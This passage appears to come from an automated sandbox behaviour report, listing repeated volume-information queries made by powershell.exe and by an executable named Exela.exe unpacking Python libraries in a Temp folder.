                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info\licenses VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pyd VolumeInformation
